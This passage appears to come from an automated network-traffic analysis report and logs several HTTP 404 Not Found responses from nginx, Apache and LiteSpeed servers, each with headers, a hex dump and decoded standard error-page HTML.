                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sd8Ww%2FW%2BucYITL%2FryslLANlYgQjyfyCJmgA3YPhjuABM2oocNs8qU8cAnL0556n1TqBMKg6YIr0qdyw2ssVD0IgEHRsPK3lw9baQB8C37FpoQFgrSLziU4UdxGhJdImkybSy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59b2bbabe10ed-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118732&min_rtt=118732&rtt_var=59366&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:35 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:37 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 
73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:40 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 
73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:54:43 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 
6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:54:57 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:55:00 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:55:03 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:55:28 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:55:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:55:34 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 